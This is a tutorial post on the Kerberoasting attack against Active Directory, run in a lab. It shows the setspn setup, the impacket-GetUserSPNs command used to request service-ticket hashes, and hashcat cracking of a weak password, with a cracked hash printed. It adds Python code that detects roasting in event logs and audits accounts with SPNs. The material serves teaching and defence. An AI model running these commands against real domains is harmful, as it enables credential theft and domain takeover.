Kerberoasting Attack

tags: AD ActiveDirectory Hashcat Impacket Kerberos TGT TGS Kerberoasting

What is Kerberos? 🐕‍🦺

Kerberos is an authentication protocol used to verify the identity of a user or host. It's designed to provide secure authentication over an insecure network.

What is a SPN?

A service principal name (SPN) is a unique identifier of a service instance. SPNs are used by Kerberos to associate a service instance with a service logon account.

An SPN is composed of two parts:
the service type (such as Web, File or SQL) and the host where the service is running. It is important to note that the host part must be written as an FQDN, followed by the port.

What is FQDN?

FQDN stands for Fully Qualified Domain Name and is simply the full domain name of a specific computer, or host.

What is the key distribution center for? 🧮

The KDC is implemented as a domain service. It uses the Active Directory as its account database and the Global Catalog for directing referrals to KDCs in other domains. The KDC is a single process that provides two services:

  • Authentication Service (AS): This service issues ticket-granting tickets (TGTs) for connection to the ticket-granting service in its own domain or in any trusted domain. Before a client can ask for a ticket to another computer, it must request a TGT from the authentication service in the client's account domain. The authentication service returns a TGT for the ticket-granting service in the target computer's domain. The TGT can be reused until it expires, but the first access to any domain's ticket-granting service always requires a trip to the authentication service in the client's account domain.

  • Ticket-Granting Service (TGS): This service issues tickets for connection to computers in its own domain. When clients want access to a computer, they contact the ticket-granting service in the target computer's domain, present a TGT, and ask for a ticket to the computer. The ticket can be reused until it expires, but the first access to any computer always requires a trip to the ticket-granting service in the target computer's account domain.

Authentication with Unconstrained Kerberos Delegation 🔐

Kerberos tickets represent the client's network credentials.

Clients obtain a Ticket-Granting Ticket (TGT) from the Authentication Service (AS) using the credentials in their cache; the AS checks that the user exists in the database and, if everything is in order, the user receives the TGT. The client then presents that TGT to the Ticket-Granting Service and receives a TGS response containing a service ticket. Finally, the client sends a request to the desired application that includes the service ticket obtained from the TGS, and the service server grants access to the service based on that ticket.

How to Kerberoasting

Prerequisites ✔

  • A domain user account with an SPN (it does not need elevated privileges, but I am going to add it to Domain Admins to mimic a bad configuration seen in the real world).
  • Our Kali machine with tools such as Impacket, PowerSploit or Empire to automate the process, and a cracking tool such as John the Ripper or hashcat.

Explanation 🗒

The Kerberoasting technique consists of requesting, from the KDC, service tickets (TGS) associated with service accounts in order to obtain their hashes, and then attempting to crack them offline with hashcat to recover the password. With that password an attacker can move laterally to other objects in the AD or escalate privileges to become a local administrator.

Setting up the environment 🔧

First, create a user account in your AD lab to act as a service account. In this example we add it to the Domain Admins group, because this is a common flaw in real environments, and we set a weak password such as Mypassword1234€.

Now, to add an SPN to the account, open a cmd and type this:

setspn -a ALPHA-DC/SQLService.ALPHA.local:60123 ALPHA\SQLService

This assigns an SPN to the service account. Looking at the command in detail we have:

  • setspn : the command itself

  • -a : the flag to add the SPN that follows, given as an FQDN (Fully Qualified Domain Name)

  • The FQDN and the port we want (SQLService.ALPHA.local:60123)

  • The NetBIOS domain name and the account (ALPHA\SQLService)

To check that it worked, type this command:

setspn -T ALPHA.local -Q */*

With this configured, now it's time to start the attack.

Kerberoasting attack process 🔥

The first step is to enumerate the SPNs, so we use impacket-GetUserSPNs to do this.
Remember that we need domain user credentials to do it remotely, plus the IP of the Domain Controller.

The command and the response will look something like this:

impacket-GetUserSPNs -dc-ip 192.168.1.200 ALPHA.local/amason:Ba66age0

First comes the command, then the flag with the DC's IP, then the domain name and the user, followed by a colon and the user's password.

Now, if we add the -request flag, we receive the hash of the TGS (service ticket), which can be cracked with hashcat or john. I prefer hashcat, so let's look at the command to crack it.
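From the defender's side, the step above is exactly what a Domain Controller logs as event 4769 (a Kerberos service ticket was requested). The following is an added example, not part of the original post: a small detector run over constructed 4769-style records that flags an account requesting RC4-encrypted (etype 0x17, the etype behind the $krb5tgs$23$ hashes) service tickets for several distinct non-machine service accounts in a short window. The key=value line format, the sample accounts and the timestamps are all made up for the example; a real deployment would read the fields from the Security log or a SIEM.

```python
"""
Added example (not from the original post): detect Kerberoasting-style
TGS requests over constructed Windows Security event 4769 records.

Indicators used:
  * TicketEncryptionType 0x17 (RC4-HMAC), which produces $krb5tgs$23$ hashes.
  * Service names that are user accounts (no trailing '$'), not krbtgt.
  * One account requesting tickets for many distinct services in a short
    window, which is what a bulk SPN request looks like.
"""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample events (subset of 4769 fields, key=value per line).
SAMPLE_EVENTS = """\
time=2024-05-01T10:00:01 account=amason@ALPHA.LOCAL service=SQLService ip=192.168.1.50 etype=0x17 status=0x0
time=2024-05-01T10:00:01 account=amason@ALPHA.LOCAL service=HTTPService ip=192.168.1.50 etype=0x17 status=0x0
time=2024-05-01T10:00:02 account=amason@ALPHA.LOCAL service=BackupSvc ip=192.168.1.50 etype=0x17 status=0x0
time=2024-05-01T10:00:02 account=amason@ALPHA.LOCAL service=krbtgt ip=192.168.1.50 etype=0x12 status=0x0
time=2024-05-01T10:05:00 account=bsmith@ALPHA.LOCAL service=WS01$ ip=192.168.1.51 etype=0x12 status=0x0
time=2024-05-01T10:06:00 account=bsmith@ALPHA.LOCAL service=SQLService ip=192.168.1.51 etype=0x12 status=0x0
"""

RC4_HMAC = 0x17  # TicketEncryptionType value for RC4-HMAC in event 4769


def parse_event(line):
    """Parse one key=value event line into a dict with typed time/etype fields."""
    fields = dict(part.split("=", 1) for part in line.split())
    fields["time"] = datetime.fromisoformat(fields["time"])
    fields["etype"] = int(fields["etype"], 16)
    return fields


def is_roastable_request(ev):
    """True when a ticket was issued with RC4 for a user-style service account."""
    svc = ev["service"]
    return (ev["etype"] == RC4_HMAC
            and not svc.endswith("$")          # machine accounts end in '$'
            and svc.lower() != "krbtgt"        # TGT renewals are not service tickets
            and ev["status"] == "0x0")         # only successful requests


def detect_kerberoasting(lines, window=timedelta(minutes=5), min_services=3):
    """Return {account: sorted service names} for accounts that obtained RC4
    service tickets for at least `min_services` distinct services within `window`."""
    by_account = defaultdict(list)
    for line in lines.splitlines():
        if not line.strip():
            continue
        ev = parse_event(line)
        if is_roastable_request(ev):
            by_account[ev["account"]].append(ev)

    alerts = {}
    for account, events in by_account.items():
        events.sort(key=lambda e: e["time"])
        # Slide a window starting at each event and count distinct services in it.
        for i, first in enumerate(events):
            in_window = [e for e in events[i:] if e["time"] - first["time"] <= window]
            services = {e["service"] for e in in_window}
            if len(services) >= min_services:
                alerts[account] = sorted(services)
                break
    return alerts


if __name__ == "__main__":
    for account, services in detect_kerberoasting(SAMPLE_EVENTS).items():
        print(f"ALERT {account}: RC4 service tickets requested for {services}")
```

In the sample data only amason trips the rule: three RC4 service tickets for three different service accounts within one second, while the krbtgt request is ignored and bsmith's AES (0x12) requests for a workstation and a single service are normal. Tune `window` and `min_services` to your environment; a single RC4 ticket for an account that should be AES-only is worth a lower-severity alert on its own.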

Copy the hash and save it into a file called krbhash.

In my case I am going to use a dictionary, because this is a lab and I know the password.

With the hashcat command we select the hash type (in this case Kerberos 5 TGS-REP), the attack mode (straight), the hash file and the dictionary file.

In my case I don't have the drivers properly installed, so I use the --force flag to start cracking anyway.

When hashcat finishes, it returns something like this:

$krb5tgs$23$*SQLService$ALPHA.LOCAL$ALPHA.local/SQLService*$6cf105cf6a98a8f70896fe839f992bb4$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:Mypassword1234€

Conclusions

Now that we know the password, we can get remote access to the network as this user. Remember that this service account has Domain Admin privileges, so with it we have access to the whole domain and can start other attacks. The lessons are clear: change the credentials of service accounts from time to time and enforce strong ones, never add service accounts to the Domain Admins group, and always give them the minimum necessary permissions, because we now know they are susceptible to Kerberoasting.
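To turn those conclusions into a check you can actually run, here is an added example (not part of the original post) that audits accounts with an SPN for the conditions described above: membership in a privileged group, a password that has not been rotated, and, as one extra hardening step beyond the post, whether RC4 service tickets are still permitted (the encryption type that produced the $krb5tgs$23$ hash). The account records are constructed for the example, shaped like the AD attributes a real script would pull over LDAP; the attribute names (servicePrincipalName, memberOf, pwdLastSet, msDS-SupportedEncryptionTypes) are the real ones.

```python
"""
Added example (not from the original post): audit SPN-bearing accounts for
the Kerberoasting risk factors the post's conclusion calls out.
The account records below are constructed; a real run would fetch the same
attributes from AD via LDAP.
"""
from datetime import datetime, timedelta

PRIVILEGED_GROUPS = {"Domain Admins", "Enterprise Admins", "Administrators"}
MAX_PASSWORD_AGE = timedelta(days=365)

# Bit flags of the msDS-SupportedEncryptionTypes attribute.
RC4_HMAC = 0x4
AES128 = 0x8
AES256 = 0x10

NOW = datetime(2024, 5, 1)  # fixed "now" so the example is reproducible

# Constructed records: a service account like the one created in the post,
# a well-configured service account, and a normal user without an SPN.
SAMPLE_ACCOUNTS = [
    {"sAMAccountName": "SQLService",
     "servicePrincipalName": ["ALPHA-DC/SQLService.ALPHA.local:60123"],
     "memberOf": ["Domain Admins", "Domain Users"],
     "pwdLastSet": datetime(2021, 1, 15),
     "msDS-SupportedEncryptionTypes": 0},   # attribute not set: RC4 still allowed by default
    {"sAMAccountName": "svc_backup",
     "servicePrincipalName": ["backup/bk01.ALPHA.local"],
     "memberOf": ["Domain Users"],
     "pwdLastSet": datetime(2024, 3, 1),
     "msDS-SupportedEncryptionTypes": AES128 | AES256},
    {"sAMAccountName": "amason",
     "servicePrincipalName": [],
     "memberOf": ["Domain Users"],
     "pwdLastSet": datetime(2020, 1, 1),
     "msDS-SupportedEncryptionTypes": 0},
]


def audit_account(acct, now=NOW):
    """Return a list of findings for one account; an empty list means nothing to flag."""
    findings = []
    if not acct["servicePrincipalName"]:
        return findings  # only accounts with an SPN can be kerberoasted
    privileged = PRIVILEGED_GROUPS & set(acct["memberOf"])
    if privileged:
        findings.append(f"SPN account is a member of {sorted(privileged)}")
    age = now - acct["pwdLastSet"]
    if age > MAX_PASSWORD_AGE:
        findings.append(f"password last set {age.days} days ago")
    etypes = acct["msDS-SupportedEncryptionTypes"]
    if etypes == 0 or etypes & RC4_HMAC:
        findings.append("RC4 service tickets allowed (no AES-only enforcement)")
    return findings


def audit(accounts, now=NOW):
    """Map each flagged account name to its list of findings."""
    return {a["sAMAccountName"]: f for a in accounts if (f := audit_account(a, now))}


if __name__ == "__main__":
    for name, findings in audit(SAMPLE_ACCOUNTS).items():
        print(name)
        for finding in findings:
            print("  -", finding)
```

Run against the sample data, only SQLService is reported, with all three findings; svc_backup has an SPN but is unprivileged, recently rotated and AES-only, and amason has no SPN so is out of scope. In production, feed the same function the results of an LDAP query for `(&(servicePrincipalName=*)(objectCategory=person))` and treat any account with a finding in the first two categories as a priority fix.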